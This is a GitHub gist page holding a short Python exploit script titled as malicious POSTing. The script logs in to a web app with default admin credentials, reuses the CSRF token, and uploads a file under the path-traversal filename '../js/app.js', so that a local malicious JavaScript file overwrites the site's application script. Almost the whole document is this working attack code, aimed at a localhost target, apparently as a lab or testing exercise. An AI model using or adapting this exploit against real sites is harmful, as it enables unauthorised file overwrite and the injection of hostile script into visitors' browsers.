Last active
September 10, 2019 12:26
-
-
Save 3m3x/4d30f549406111e662e33ca0a6bf3890 to your computer and use it in GitHub Desktop.
Malicious POSTing with the requests library
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| LOGIN_URL = 'http://localhost:8888/login' | |
| sesh = requests.Session() # create cookie-persisting session | |
| login_page = sesh.get(LOGIN_URL) | |
| assert login_page.status_code == 200 | |
| print(sesh.cookies) # we should see our 'csrftoken' cookie | |
| CREDS = { | |
| 'username': 'admin', | |
| 'password': 'password', | |
| 'csrfmiddlewaretoken': sesh.cookies['csrftoken'] | |
| } | |
| login_result = sesh.post(LOGIN_URL, data=CREDS) | |
| assert login_result.status_code == 200 | |
| ARTICLE_WRITE_URL = 'http://localhost:8888/articles/write/' | |
| # Use request-toolbelt's multipart encoder so we can direct our payload to a malicious place on the filesystem | |
| # by munging the filename. | |
| from requests_toolbelt.multipart.encoder import MultipartEncoder | |
| menc = MultipartEncoder( | |
| fields={ | |
| 'attachment': ( | |
| '../js/app.js', open('/home/scan/Documents/malicious_app.js', 'rb'), | |
| 'text/javascript' | |
| ), | |
| 'title': 'whatever title', | |
| 'content': 'whatever content', | |
| 'tags': '', | |
| 'status': 'P', | |
| 'csrfmiddlewaretoken': sesh.cookies['csrftoken'] | |
| } | |
| ) | |
| post_result = sesh.post( | |
| ARTICLE_WRITE_URL, | |
| data=menc, | |
| headers={ | |
| 'Content-Type': menc.content_type | |
| }, | |
| hooks={ | |
| 'response': lambda req, *args, **kwargs: print(req.text, f'HTTP status: {req.status_code}') | |
| } | |
| ) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment